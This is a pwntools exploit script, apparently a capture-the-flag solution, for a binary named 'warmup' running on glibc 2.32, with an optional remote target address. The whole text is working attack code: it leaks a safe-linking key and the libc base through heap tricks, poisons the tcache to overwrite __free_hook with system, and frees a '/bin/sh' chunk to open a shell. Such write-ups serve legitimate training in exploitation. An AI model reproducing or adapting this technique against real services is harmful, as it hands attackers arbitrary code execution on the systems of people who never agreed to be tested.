1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83
| from pwn import * import sys context.log_level='debug' context.arch='amd64'
binary = './warmup' elf=ELF(binary) libc = ELF('/home/wendy/Desktop/glibc-all-in-one/libs/2.32-0ubuntu3_amd64/libc.so.6') flag=0 if flag: sh = remote('47.104.70.90', 25315) else: sh = process(binary)
sa = lambda s,n : sh.sendafter(s,n) sla = lambda s,n : sh.sendlineafter(s,n) sl = lambda s : sh.sendline(s) sd = lambda s : sh.send(s) rc = lambda n : sh.recv(n) ru = lambda s : sh.recvuntil(s) ti = lambda : sh.interactive() leak = lambda name,addr :log.success(name+":"+hex(addr)) def leaklibc(): global libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_,_IO_list_all,realloc libc_base = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x1e4030 success('libc_base = '+hex(libc_base)) __malloc_hook=libc_base+libc.sym['__malloc_hook'] __free_hook=libc_base+libc.sym['__free_hook'] system=libc_base+libc.sym['system'] realloc=libc_base+libc.sym['realloc'] def cmd(index): sla('> ', str(index)) def add(index,sz,data): cmd(1) sla('idx: ',str(index)) sla('sz: ',str(sz)) sa('data: ',data) def edit(index,data): cmd(3) sla('idx: ',str(index)) sa('data: ',data) def show(index): cmd(2) sla('idx: ',str(index)) def dele(index): cmd(4) sla('idx: ',str(index)) def save(index): cmd(5) sla('idx: ',str(index))
add(0,0x10,'a') add(1,0x500,'b') add(2,0x20,'a') add(3,0x20,'a') add(4,0x20,'a')
dele(0) dele(1)
add(0,0,'') show(0) ru('data: ') key = u64(rc(5).ljust(8,'\x00')) leak('key',key)
add(1,0,'') show(1) leaklibc()
dele(3) save(4) dele(4)
edit(4,p64(__free_hook^key) + p64((key<<12) + 0x10) + '\n') add(5,0x20,'/bin/sh\x00\n') add(6,0x20,p64(system)+'\n') dele(5)
ti()
|